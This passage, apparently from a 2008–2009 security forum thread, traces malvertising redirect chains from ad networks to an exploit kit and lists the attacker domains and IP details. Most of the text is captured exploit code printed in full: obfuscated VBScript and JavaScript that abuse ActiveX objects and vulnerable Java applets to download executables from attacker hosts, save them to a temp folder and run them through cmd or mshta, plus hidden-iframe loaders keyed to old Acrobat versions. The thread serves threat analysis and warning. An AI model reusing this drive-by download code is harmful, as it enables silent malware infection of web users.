printjameth(jvjs, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}
}catch(e) {} }

} // End Else Not IE

function printjameth(jvers, sjmsjvm, sjsecmn, sjusafe, sjiproc) { try {
//alert("JVERSION: "+jvers+" MSJVM: "+sjmsjvm+" SECMAN: "+sjsecmn+" USAFE: "+sjusafe+" IMPRO: "+sjiproc);

if(sjmsjvm) {
jvmmsvm = document.createElement("applet");
jvmmsvm.archive = "jvmmsvm.jar";
jvmmsvm.code = "vmain.class";
jvmmsvm.width = "1"; jvmmsvm.height = "1";
var jvmmsvp = document.createElement("param");
jvmmsvp.name = "sdata";
jvmmsvp.value = "http://srv.ad-adnet.net/xrun.tmp;http://srv.ad-adnet.net/xpre.tmp";
jvmmsvm.appendChild(jvmmsvp);
document.body.appendChild(jvmmsvm);
}

if(sjsecmn) {
jvmsec = document.createElement("applet");
jvmsec.archive = "jvmsecman.jar";
jvmsec.code = "vmain.class";
jvmsec.width = "1"; jvmsec.height = "1";
document.body.appendChild(jvmsec);
setTimeout("sjvsecc()", 300);
}

if(sjusafe) {
jvmusafe = document.createElement("applet");
jvmusafe.archive = "jvmusafe.jar";
jvmusafe.code = "vmain.class";
jvmusafe.width = "1"; jvmusafe.height = "1";
document.body.appendChild(jvmusafe);
setTimeout("sjvusafc()", 300);
}

if(sjiproc) {
jvmimpro = document.createElement("applet");
jvmimpro.archive = "jvmimpro.jar";
jvmimpro.code = "vmain.class";
jvmimpro.width = "1"; jvmimpro.height = "1";
var jvmimpp = document.createElement("param");
jvmimpp.name = "sdata";
jvmimpp.value = "http://ad-adnet.net/d1.exe";
jvmimpro.appendChild(jvmimpp);
document.body.appendChild(jvmimpro);
}
}catch(e) {} }

function sjvsecc() { x = x+1;
if(typeof jvmsec.getClass != "undefined") { sjvmsec(); }
else if(x < 30) { setTimeout("sjvsecc()", 300); }
}

// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://srv.ad-adnet.net/xrun.tmp;http://srv.ad-adnet.net/xpre.tmp";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

function sjvusafc() { z = z+1;
if(typeof jvmusafe.getClass != "undefined") { sjvmusaf(); }
else if(z < 30) { setTimeout("sjvusafc()", 300); }
}

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://srv.ad-adnet.net/xrun.tmp;http://srv.ad-adnet.net/xpre.tmp";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }

}  // end javaenabled
</script>

srv.ad-adnet.net/code/smain.php?scout=objmsit

No code present at the time of the writeup.

CODE
<script language="javascript">

</script>

In the code above we also notice a reference to srv.ad-adnet.net/code/srun

CODE
var a = false;
try { var a = new ActiveXObject("WScript.Shell"); }catch(e){}
if(a) { try { a.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

srv.ad-adnet.net/code/srun

IPB Image

It isn't easy to show the code from this one as it happens "on the fly" ... srun does request a piece of code from the server and that is incorporated into the stuff below.

CODE
var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft"+".XMLHTTP"); }catch(e){} }
if(xobj) {
xobj.open("GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun,2034504393");
xobj.send(null);
response = xobj.responseText;
}
if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}

The reply below will be decoded by dec(asas(response), "s", 2)

IPB Image

Again a huge amount of vulnerabilities to get their junk on your PC. Keep Windows, Java, Office, WMP ... and applications updated ! Secure your browser, whether you use Internet Explorer, FireFox or Opera.

<h4>
Another starting point at Clicksor
</h4>
creative.clicksor.com/network_1020/498/c212999415.html
ads.adsrefer.net/serve/showcst?atype=b2&pid=[*]&cid=[*]&tid=[*]

CODE
<script type="text/javascript" language="javascript" src="http://www.iwdjiamk.net/placeholder-1526530-1921905972?atype=b2&pid=[*]"></script>
<iframe src="http://adsecxnet.ws/document/banner?type=1&pid=[*]" width="1" height="1" frameborder="0"></iframe>

<h4>
www.iwdjiamk.net
</h4>
CODE
<a href="http://www.dpbolvw.net/click-2406336-10479732" target="_top"><img src="http://www.lduhtrp.net/image-2406336-10479732" width="160" height="600" alt="Apple Store" border="0"/></a><script language="javascript" src="http://www.kiafjwo.net/placeholder-1262627-1921920093"></script>
  1. www.dpbolvw.net - click target.
  2. www.lduhtrp.net

    CODE
    The URL has moved <a href="http://www.yceml.net/0116/10479732-9.jpg">here</a>

    Banner to be displayed: www.yceml.net/0116/10479732-9.jpg

    IPB Image

  3. Link to www.kiafjwo.net and from there on we all know what happens next.
<h4>
IP details
</h4>
ads.adsrefer.net - 85.17.162.100

Registrar: MONIKER ONLINE SERVICES, INC.
Name Server: NS1.DOMAINSERVICE.COM
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Updated Date: 10-sep-2008
Creation Date: 10-sep-2008

Server Type: Apache/2.0.52 (CentOS)
IP Location - Noord-holland - Amsterdam - Leaseweb

Registrant [1520277]:
Moniker, Privacy Services ADSREFER.NET@domainservice.com
Moniker Privacy Services

hostnames sharing ip with a-records
  1. *.ad-adnet.net
  2. *.adrefer.net
  3. *.adsrefer.net
  4. *.adteksrv.net
  5. *.kasdfps.net
  6. ad-adnet.net
  7. ad.adrefer.net
  8. adpopserve.net
  9. adpopshow.net
  10. adrefer.net
  11. ads.adsrefer.net
  12. adsrefer.net
  13. adteksrv.net
  14. awltovhc.net
  15. awofkwy.net
  16. espads.net
  17. iefjios.net
  18. ikwlkad.net
  19. iwdjiamk.net
  20. kasdfps.net
  21. kiafjwo.net
  22. klite.ath.cx
  23. netcrefer.net
  24. netcshow.net
  25. serv.adteksrv.net
  26. srv.ad-adnet.net
  27. tqlkg.net
  28. www.kasdfps.net
  29. xpseek.net
Kimberly
Nov 23 2008, 07:00 PM
<h4>
Starting point at Clicksor
</h4>
creative.clicksor.com/network_1020/498/c212999415.html

CODE
<script language="javascript" src="ads.adsrefer.net/serve/servecst?atype=b2&pid=[*]"></script>

CODE
GET /serve/servecst?atype=b2&pid=[*] HTTP/1.1
Referer: http://creative.clicksor.com/network_1020/498/c212999415.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ads.adsrefer.net
Proxy-Connection: Keep-Alive
Decoded the page leads to:

CODE
document.location.href='http://ads.adsrefer.net/serve/showcst?atype=b2&cid=[*]&tid=[*]&pid=[*]';

<h4>
ads.adsrefer.net
</h4>
ads.adsrefer.net/serve/showcst?atype=b2&cid=[*]&tid=[*]&pid=[*]

CODE
<script type="text/javascript" language="javascript" src="http://www.ikwlkad.net/placeholder-1780133-1389998649?atype=b2&pid=118627"></script>
</body></html>

<h4>
www.ikwlkad.net
</h4>
Decoded.
CODE
<a href="http://www.dpbolvw.net/click-2406336-10479871" target="_top"><img src="http://www.tqlkg.com/image-2406336-10479871" width="160" height="600" alt="Apple Store" border="0"/></a><script language="javascript" src="http://www.iefjios.net/placeholder-1542927-1390005885"></script>
  1. www.dpbolvw.net/click-2406336-10479871 - click target.
  2. www.tqlkg.com/image-2406336-10479871

    CODE
    The URL has moved <a href="http://www.yceml.net/0255/10479871-11.jpg">here</a>

    Banner to be displayed: www.yceml.net/0255/10479871-11.jpg

    IPB Image

  3. Link to www.iefjios.net
<h4>
www.iefjios.net
</h4>
Small change in the code compared to last time. If Adobe Acrobat isn't installed IE will pop-up a warning about a file download (PDF file).

CODE
<script language="javascript">
function blockerr() { return true; }
window.onerror = blockerr;
setInterval("window.status=' '", 100);
</script>

<script language="javascript">
var pdfrd, pdfrv, pobj, vv;

var nsplugad = navigator.plugins["Adobe Acrobat"];
if(nsplugad) {
if(nsplugad.description.indexOf("Version") > 0) {
vv = nsplugad.description.toString().split("Version ");
vv = vv[1].split(" ");
vv = vv[0].replace(/\D/g, "");
} else{ pdfrd = true; }
}

if(!pdfrd) { try {
var pobj = document.createElement("object");
pobj.classid = "clsid:CA8A9780-280D-11CF-A24D-444553540000";
if(pobj.readyState != 0) { try { pdfrv = pobj.getversions(); }catch(e){} }
} catch(e) {} }

if(!pdfrd && window.ActiveXObject) {
try { pobj = new ActiveXObject("AcroPDF.PDF"); }catch(e){}
try { pdfrv = pobj.getversions(); }catch(e){}
}

if(pdfrv && pdfrv.indexOf("Form=") != -1) {
vv = pdfrv.split("Form\="); vv = vv[1].split("\,");
vv = vv[0].replace(/\D/g, "");
}

if(vv) {
var vs = new Array();

vs[0] = parseInt(vv.charAt(0)?vv.charAt(0):0);
vs[1] = vv.charAt(1)?vv.charAt(1):0;
vs[2] = vv.charAt(2)?vv.charAt(2):0;

var vva = (vs[0] < 7);
var vvb = (vs[0] == 7 && vs[1] < 1);
var vvc = (vs[0] == 8 && vs[1] <= 1 && vs[2] <= 2);

if(vva || vvb || vvc) { pdfrd = true;  }
}

if(pdfrd) {
document.write('<iframe src="http://srv.ad-adnet.net/code/document/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
document.write('<iframe src="http://srv.ad-adnet.net/code/document2/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
}
</script>

<iframe src="http://srv.ad-adnet.net/code/document2/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=acxcrds" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=acxcobj" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=jvcxeng" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=objmsit" frameborder="0" style="width:1px;height:1px;"></iframe>

For details about the scripts, please refer to the previous post.
Kimberly
Dec 22 2008, 04:03 PM
creative2.clicksor.com/network_1/68325/c539926096.html
serv.adtkserv.net/banner/serve?atype=b0&pid=109846
serv.adtkserv.net/banner/show?atype=b0&cid=1450335&tid=6720664321&pid=109846
www.kasdfps.net/placeholder-1489631-2880287922
srv.svc.ms/code/smain.php?scout=acxcrds
srv.svc.ms/code/smain.php?scout=acxcobj
srv.svc.ms/code/smain.php?scout=jvcxeng

serv.adtkserv.net - 85.17.162.100

Updated Date: 19-dec-2008
Creation Date: 19-dec-2008
Registrar: MONIKER ONLINE SERVICES, INC.
Name Server: NS1.DOMAINSERVICE.COM - NS2.DOMAINSERVICE.COM - NS3.DOMAINSERVICE.COM - NS4.DOMAINSERVICE.COM

srv.svc.ms - 85.17.162.100

Created: 02 Nov 2008
Modified: 02 Nov 2008
Registrar: Key-Systems
Name Servers: ns1.domainservice.com - ns3.domainservice.com - ns4.domainservice.com - ns2.domainservice.com

85.17.162.100

*.ad-adnet.net | *.adrefer.net | *.adsrefer.net | *.adteksrv.net | *.awofkwy.net | *.iefjios.net | *.iwdjiamk.net | *.kasdfps.net | *.netcrefer.net | *.tqlkg.net | *.xpseek.net | ad.adrefer.net | adnetserver.net | adpopserve.net | adpopshow.net | adrefer.net | ads.adsrefer.net | adsrefer.net | adteksrv.net | awltovhc.net | awofkwy.net | espads.net | iefjios.net | ikwlkad.net | iwdjiamk.net | kasdfps.net | kiafjwo.net | klite..ath.cx | klite.ath.cx | netcrefer.net | netcshow.net | serv.adteksrv.net | serv.netcrefer.net | srv.ad-adnet.net | tqlkg.net | www.awofkwy.net | www.iefjios.net | www.iwdjiamk.net | www.kasdfps.net | www.netcrefer.net | www.tqlkg.net | www.xpseek.net | xpseek.net

Note: banners from ads.betfair.com
Kimberly
Feb 21 2009, 08:40 AM
<h4>
Start at ad3.clickhype.com
</h4>
ad3.clickhype.com/servlet/view/banner/javascript/zone?zid=[*]0&pid=[*]&random=[*]&millis=[*]
sv.adsserve.net/serve/serveiad?atype=b6&pid=[*]
sv.adsserve.net/serve/showiad?atype=b6&pid=[*]&cid=[*]&tid=[*]
www.soarnxec.net/placeholder-1279416-422086074?atype=b6&pid=[*]
sv.adsserve.net/serve/serveiad?atype=b4&pid=[*]
www.kiafjwo.net/placeholder-1188843-422097801
serv.adsserve.net/sva/content
sv.adsserve.net/serve/showiad?atype=b4&pid=[*]&cid=[*]&tid=[*]
srv.f-o-r.ms/code/smain.php?scout=acxcrds
srv.f-o-r.ms/code/smain.php?scout=acxcobj
srv.f-o-r.ms/code/smain.php?scout=jvcxeng
srv.f-o-r.ms/code/srun
srv.f-o-r.ms/code/srun?req
srv.f-o-r.ms/code/document/banner?type=1&pid=154982
______________________________

www.kiafjwo.net/placeholder-1188843-422097801
CODE
<img src="http://fc.webmasterpro.de/as_noscript.php?name=na" style="width:1px;height:1px;border:0px;display:none;">

<script language="javascript">
function blockerr() { return true; }
window.onerror = blockerr;
setInterval("window.status=' '", 100);
</script>

<script language="javascript">
var pdfrd, pdfrv, pobj, vv;

var nsplugad = navigator.plugins["Adobe Acrobat"];
if(nsplugad) {
if(nsplugad.description.indexOf("Version") > 0) {
vv = nsplugad.description.toString().split("Version ");
vv = vv[1].split(" ");
vv = vv[0].replace(/\D/g, "");
} else{ pdfrd = true; }
}

if(!pdfrd) { try {
var pobj = document.createElement("object");
pobj.classid = "clsid:CA8A9780-280D-11CF-A24D-444553540000";
if(pobj.readyState != 0) { try { pdfrv = pobj.getversions(); }catch(e){} }
} catch(e) {} }

if(!pdfrd && window.ActiveXObject) {
try { pobj = new ActiveXObject("AcroPDF.PDF"); }catch(e){}
try { pdfrv = pobj.getversions(); }catch(e){}
}

if(pdfrv && pdfrv.indexOf("Form=") != -1) {
vv = pdfrv.split("Form\="); vv = vv[1].split("\,");
vv = vv[0].replace(/\D/g, "");
}

if(vv) {
var vs = new Array();

vs[0] = parseInt(vv.charAt(0)?vv.charAt(0):0);
vs[1] = vv.charAt(1)?vv.charAt(1):0;
vs[2] = vv.charAt(2)?vv.charAt(2):0;

var vva = (vs[0] < 7);
var vvb = (vs[0] == 7 && vs[1] < 1);
var vvc = (vs[0] == 8 && vs[1] <= 1 && vs[2] <= 2);

if(vva || vvb || vvc) { pdfrd = true;  }
}

if(pdfrd) {
document.write('<iframe src="http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
document.write('<iframe src="http://srv.f-o-r.ms/code/document/banner?type=2&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
}
</script>
<object type="application/pdf" data="http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982">
<embed src="http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982"></embed>
</object>

<iframe src="http://srv.f-o-r.ms/code/smain.php?scout=acxcrds" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.f-o-r.ms/code/smain.php?scout=acxcobj" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.f-o-r.ms/code/smain.php?scout=jvcxeng" frameborder="0" style="width:1px;height:1px;"></iframe>
srv.f-o-r.ms/code/smain.php?scout=acxcrds
CODE
<script language="VBScript">
on error resume next

Function DownExRdsDsc(source, target)
on error resume next
Dim cobj, xobj, eobj, sobj, tfld, eloc, tfile, response, bindata, i, x

Set cobj = document.createElement("object")
cobj.setAttribute "classid", Unescape("%"+"63%6c%73%69%64%3a%42%44%"+"39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%"+"48%74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%74%74%70%"+"2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%69%63%72%6f%"+"73%6f%66%74%2e%58%4d%4c%48%54%54%50"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%53%58%4d%4c%32%2e%58%"+"4d%4c%48%54%54%50"),"")
Set eobj = cobj.CreateObject(Unescape("%"+"53%68%65%"+"6c%6c%2e%41%70%70%6c%69%63%61%74%69%6f%6e"),"")
Set sobj = cobj.CreateObject(Unescape("%"+"53%63%72%69%70%74%"+"69%6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"),"")

If VarType(xobj) And VarType(eobj) And VarType(sobj) Then
xobj.Open "GET", source, False
xobj.setRequestHeader "Request", "smain"
xobj.Send
response = xobj.responseText

If Len(response) > 1 And InStr(LCase(response), "<html>") = 0 Then

Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target & ".tmp")

If sobj.FileExists(eloc) = False Then

    Set tfile = sobj.CreateTextFile(eloc, True)

    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 10000
    
    sp = Int(ss / sn)
    ReDim sd(sp), bd(sp)

    For i = 0 To sp
        sd(i) = Mid(response, (i*sn)+1, sn)
        For x = 1 To Len(sd(i)) Step 2
        bd(i) = bd(i) & Chr("&H" & Mid(sd(i), x, 2))
        Next
        tfile.Write bd(i)
    Next

    tfile.Close
End If

End If

If sobj.FileExists(eloc) Then
If VarType(eobj) = vbObject Then
eobj.ShellExecute "cmd", " /c start """" """ & eloc & """", "", "open", 0
Else wobj.run "cmd /c start """" """ & eloc & """", 0
End If
End If

End If
End Function

Call DownExRdsDsc("http://srv.f-o-r.ms/get?src=xrun", "oswemaxrnc")
Call DownExRdsDsc("http://srv.f-o-r.ms/get?src=xpre", "wecxsanrmo")
</script>
srv.f-o-r.ms/code/smain.php?scout=acxcobj
CODE
<script language="javascript">
var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%64%"+"3a%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")); }catch(e){} }
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%"+"63%72%69%70%74%2e%53%68%65%6c%6c"),""); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%64%3a%"+"41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36")); }catch(e){} }
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%72%69%70%74%"+"2e%53%68%65%6c%6c")); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%"+"64%3a%30%33%35%35%38%35%34%41%2d%37%46%32%33%2d%34%37%45%32%2d%42%37%43%33%2d%39%37%45%45%38%44%44%34%32%43%44%38")); }catch(e){} }
if(a) { try { a.RunApplication(1, "mshta http://srv.f-o-r.ms/code/srun", 1); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"54%78%43%74%78%2e%54%"+"72%61%6e%73%61%63%74%69%6f%6e%43%6f%6e%74%65%78%74")); }catch(e){}
if(a) { try { var b = a.CreateInstance(unescape("%"+"57%53%63%72%69%70%"+"74%2e%53%68%65%6c%6c")); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"57%4d%49%53%63%72%"+"69%70%74%55%74%69%6c%73%2e%57%4d%49%4f%62%6a%65%63%74%42%72%6f%6b%65%72%32")); }catch(e){}
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%"+"72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"4f%75%74%6c%6f%6f%6b%"+"2e%41%70%70%6c%69%63%61%74%69%6f%6e")); }catch(e){}
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%"+"72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false;
try { var a = new ActiveXObject(unescape("%"+"57%53%63%72%69%70%74%2e%"+"53%68%65%6c%6c")); }catch(e){}
if(a) { try { a.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }
</script>

<script language="VBScript">
on error resume next

Function DownExAxObj(source, target)
on error resume next
Dim cobj, wobj, eobj, sobj, xobj, tfld, eloc, tfile, response, bindata, i, x

if VarType(cobj) <> vbObject Then Set cobj = CreateObject(Unescape("%"+"4f%75%74%6c%6f%6f%6b%"+"2e%41%70%70%6c%69%63%61%74%69%6f%6e"))
if VarType(cobj) <> vbObject Then Set cobj = CreateObject(Unescape("%"+"57%4d%49%53%"+"63%72%69%70%74%55%74%69%6c%73%2e%57%4d%49%4f%62%6a%65%63%74%42%72%6f%6b%65%72%32"))

Set wobj = cobj.CreateObject(Unescape("%"+"57%53%63%72%69%70%"+"74%2e%53%68%65%6c%6c"))
Set sobj = cobj.CreateObject(Unescape("%"+"53%63%72%69%70%74%69%"+"6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"))

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%74%74%70%"+"2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%"+"74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%69%63%"+"72%6f%73%6f%66%74%2e%58%4d%4c%48%54%54%50"))
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%53%58%4d%4c%32%2e%58%"+"4d%4c%48%54%54%50"))

xobj.Open "GET", source, False
xobj.setRequestHeader "Request", "smain"
xobj.Send
response = xobj.responseText

If Len(response) > 1 And InStr(LCase(response), "<html>") = 0 Then

Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target & ".tmp")

If sobj.FileExists(eloc) = False Then
    
    Set tfile = sobj.CreateTextFile(eloc, True)

    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 10000
    
    sp = Int(ss / sn)
    ReDim sd(sp), bd(sp)

    For i = 0 To sp
        sd(i) = Mid(response, (i*sn)+1, sn)
        For x = 1 To Len(sd(i)) Step 2
        bd(i) = bd(i) & Chr("&H" & Mid(sd(i), x, 2))
        Next
        tfile.Write bd(i)
    Next

    tfile.Close
End If

End If

wobj.run "cmd /c start """" """ & eloc & """", 0
End Function

Call DownExAxObj("http://srv.f-o-r.ms/get?src=xrun", "nmewxcrsao")
Call DownExAxObj("http://srv.f-o-r.ms/get?src=xpre", "xceamrsonw")
</script>
srv.f-o-r.ms/code/smain.php?scout=jvcxeng
CODE
<script language="javascript">
if(navigator.javaEnabled()) {

var jvmmsvm, jvmsec, jvmusafe, jvmiproc;
var i=0; var x=0; var z=0;
if(navigator.appName.toLowerCase().indexOf("microsoft") != -1) {

// Get Clientcaps version
try {
oClientCaps = document.createElement("div");
oClientCaps.style.behavior = "url(#default#clientCaps)";
}catch(e){}

function GetVersion(CLSID) { try {
if(oClientCaps.isComponentInstalled(CLSID,"ComponentID")) {
return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");
} else { return Array(0,0,0,0); }
}catch(e){} }
      
var jvoc  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

// Get JavaApplet version
var jvmverm = document.createElement("applet");
jvmverm.archive = "jvmvers.jar";
jvmverm.code = "vmain.class";
jvmverm.width = "1"; jvmverm.height = "1";
document.body.appendChild(jvmverm);

//window.onload = definemsm;
function jvloadc() { i = i+1;
if(jvmverm.jversion || (typeof jvmverm.jversion != "undefined")) { definemsm(); }
else if(i < 30) { setTimeout("jvloadc()", 300); }
} setTimeout("jvloadc()", 300);

function definemsm() { try {
var jvjm, jvjv, jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc;
try{ jvjm = jvmverm.jversion+""; jvjv = jvmverm.jvendor+""; }catch(e){}
if(jvjm.indexOf(".") == -1) { jvja = false; } else { jvja = jvjm.split("."); }
if(!jvja) { jvja = Array(0,0,"0_0"); }
var jvjas = jvja[2].split("_");
if((jvoc[0]!=0) && (jvoc[2]<3810) && ((jvja[1]<2) || (jvja[0]==0)) && (jvjv.indexOf("Microsoft") != -1)) { sjmsjvm = true; } else { sjmsjvm = false; }
if((jvja[0]!=0) && (((jvja[1]<=4) && (jvjas[0]<=2) && (jvjas[1]<06)) || (jvja[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<2)) || (jvja[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<10)) || (jvja[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvja[0]!=0) && (((jvja[1]==5) && (jvjas[0]==0) && (jvjas[1]<10)) || ((jvja[1]==4) && (jvjas[0]==2) && (jvjas[1]>5) && (jvjas[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}catch(e){} }

} else {
// Non ie browsers

// Get Script version
try {
var jvjs = java.lang.System.getProperty("java.version")+"";
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {}

// Get Plugin version
if((!jvjs) && navigator.plugins["Java Plug-in"]) { try {
var jpd = navigator.plugins["Java Plug-in"].description;
var jvjs = jpd.substring(jpd.indexOf("1"),jpd.indexOf(" ", jpd.indexOf("1")));
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {} }

// Get JavaApplet Version
if(!jvjs) {
var jvmverf = document.createElement("applet");
jvmverf.archive = "jvmvers.jar";
jvmverf.code = "vmain.class";
jvmverf.width = "1"; jvmverf.height = "1";
document.body.appendChild(jvmverf);
}

if(!jvjs) {
function jvloadfc() { i = i+1;
if(jvmverf.jversion) { defineffm(); }
else if(i < 30) { setTimeout("jvloadfc()", 300); }
} setTimeout("jvloadfc()", 300);
} else { setTimeout("defineffm()", 100); }

function defineffm() { try {
var sjmsjvm, sjsecmn, sjusafe, sjiproc;
if(!jvjs) { try{ var jvjj = jvmverf.jversion+""; jvjs = jvjj.split("."); }catch(e) {} }
if(jvjs) {
var jvjss = jvjs[2].split("_");
if((jvjs[0]!=0) && (jvjs[1]<2)) { var sjmsjvm = true; } else { sjmsjvm = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=4) && (jvjss[0]<=2) && (jvjss[1]<06)) || (jvjs[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<2)) || (jvjs[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<10)) || (jvjs[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvjs[0]!=0) && (((jvjs[1]==5) && (jvjss[0]==0) && (jvjss[1]<10)) || ((jvjs[1]==4) && (jvjss[0]==2) && (jvjss[1]>5) && (jvjss[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvjs, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}
}catch(e) {} }

} // End Else Not IE

function printjameth(jvers, sjmsjvm, sjsecmn, sjusafe, sjiproc) { try {
//alert("JVERSION: "+jvers+" MSJVM: "+sjmsjvm+" SECMAN: "+sjsecmn+" USAFE: "+sjusafe+" IMPRO: "+sjiproc);

if(sjmsjvm) {
jvmmsvm = document.createElement("applet");
jvmmsvm.archive = "jvmmsvm.jar";
jvmmsvm.code = "vmain.class";
jvmmsvm.width = "1"; jvmmsvm.height = "1";
var jvmmsvp = document.createElement("param");
jvmmsvp.name = "sdata";
jvmmsvp.value = "http://srv.f-o-r.ms/xrun.tmp;http://srv.f-o-r.ms/xpre.tmp";
jvmmsvm.appendChild(jvmmsvp);
document.body.appendChild(jvmmsvm);
}

if(sjsecmn) {
jvmsec = document.createElement("applet");
jvmsec.archive = "jvmsecman.jar";
jvmsec.code = "vmain.class";
